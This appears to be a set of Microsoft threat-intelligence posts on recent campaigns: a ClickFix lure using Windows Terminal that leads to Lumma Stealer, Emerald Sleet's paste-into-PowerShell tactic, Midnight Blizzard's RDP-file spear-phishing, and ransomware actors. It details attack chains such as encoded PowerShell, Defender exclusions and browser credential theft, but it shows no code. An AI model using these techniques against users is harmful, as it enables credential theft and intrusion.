Microsoft Defender Experts identified a widespread ClickFix social engineering campaign in February 2026 leveraging Windows Terminal as the primary execution mechanism. Rather than the traditional Win + R → paste → execute technique, this campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users.

This approach bypasses detections specifically tuned to Run dialog abuse while exploiting the legitimacy and familiarity of Windows Terminal. Once the terminal is opened, targets are prompted to paste malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign.

What makes this campaign notable are the post-compromise outcomes. The first attack path begins when a user pastes a hex-encoded, XOR-compressed command copied from the ClickFix lure into a Windows Terminal session. This action spawns additional Windows Terminal/PowerShell instances, ultimately launching another powershell.exe process responsible for decoding the embedded hex commands.

The decoded PowerShell script downloads a legitimate but renamed 7-Zip binary and saves it with a randomized file name, along with a ZIP payload. The renamed archive utility extracts and executes a multi-stage attack chain that includes retrieval of additional payloads, persistence through scheduled tasks, defense evasion through Microsoft Defender exclusions, and exfiltration of stolen machine and network data.

The final-stage payload, deployed to C:\ProgramData\app_config\ctjb, is found to be a Lumma Stealer component that performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes. The stealer targets high-value browser artifacts, including Web Data and Login Data, harvesting stored credentials and exfiltrating them to attacker-controlled infrastructure.

In the second attack path, when a user pastes a hex-encoded, XOR-compressed command into Windows Terminal, the command downloads a randomly named .bat file to AppData\Local that is invoked through cmd.exe to write a VBScript to %Temp%. The batch script is then executed via cmd.exe with the /launched command-line argument. The same batch script is then executed through MSBuild.exe, resulting in LOLBin abuse.

The script connects to Crypto Blockchain RPC endpoints, indicating etherhiding technique. It also performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes to harvest Web Data and Login Data.

Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.

To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a spear-phishing email with an PDF attachment.

To read the PDF file attached to the email, the target is lured to click a URL with instructions to register their device. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet.

In the last quarter of 2024, Microsoft Threat Intelligence observed developments in the ransomware ecosystem that researchers and defenders should watch for in 2025. 🧵

Exploitation of vulnerabilities remains a key method for initial access. In October, the threat actor Lace Tempest, known for exploiting 0-days in file-transfer software, was observed exploiting vulnerabilities in Cleo products (CVE-2024-50623, CVE-2024-55956).

This exploitation activity increased in December and, as in past campaigns, Lace Tempest performed double extortion via the Clop leak site. Among ransomware leak sites, however, RansomHub saw the most activity.

Microsoft Threat Intelligence has observed Russian threat actor Midnight Blizzard sending a series of highly targeted spear-phishing emails to individuals in government, academia, defense, non-governmental organizations, and other sectors. msft.it/6011W3CGX

Based on our investigation of previous Midnight Blizzard spear-phishing campaigns, we assess that the goal of this operation is likely intelligence collection.

The spear-phishing emails in this campaign were sent to thousands of targets in over 100 organizations and contained a signed Remote Desktop Protocol (RDP) configuration file that connected to an actor-controlled server.

Microsoft observed the financially motivated threat actor tracked as Vanilla Tempest using INC ransomware for the first time to target the healthcare sector in the United States.

Vanilla Tempest receives hand-offs from Gootloader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool.

The threat actor then performs lateral movement through Remote Desktop Protocol (RDP) and uses the Windows Management Instrumentation Provider Host to deploy the INC ransomware payload.

In the second quarter of 2024, financially motivated threat actor Octo Tempest, our most closely tracked ransomware threat actor, added RansomHub and Qilin to its ransomware payloads in campaigns.

Octo Tempest, known for its sophisticated social engineering techniques, identity compromise and persistence, focus on targeting VMWare ESXi servers, and deployment of BlackCat ransomware, accounts for a significant bulk of our investigations and incident response engagements.

RansomHub is a ransomware as a service (RaaS) payload used by more and more threat actors, including ones that have historically used other (sometimes defunct) ransomware payloads (like BlackCat), making it one of the most widespread ransomware families today.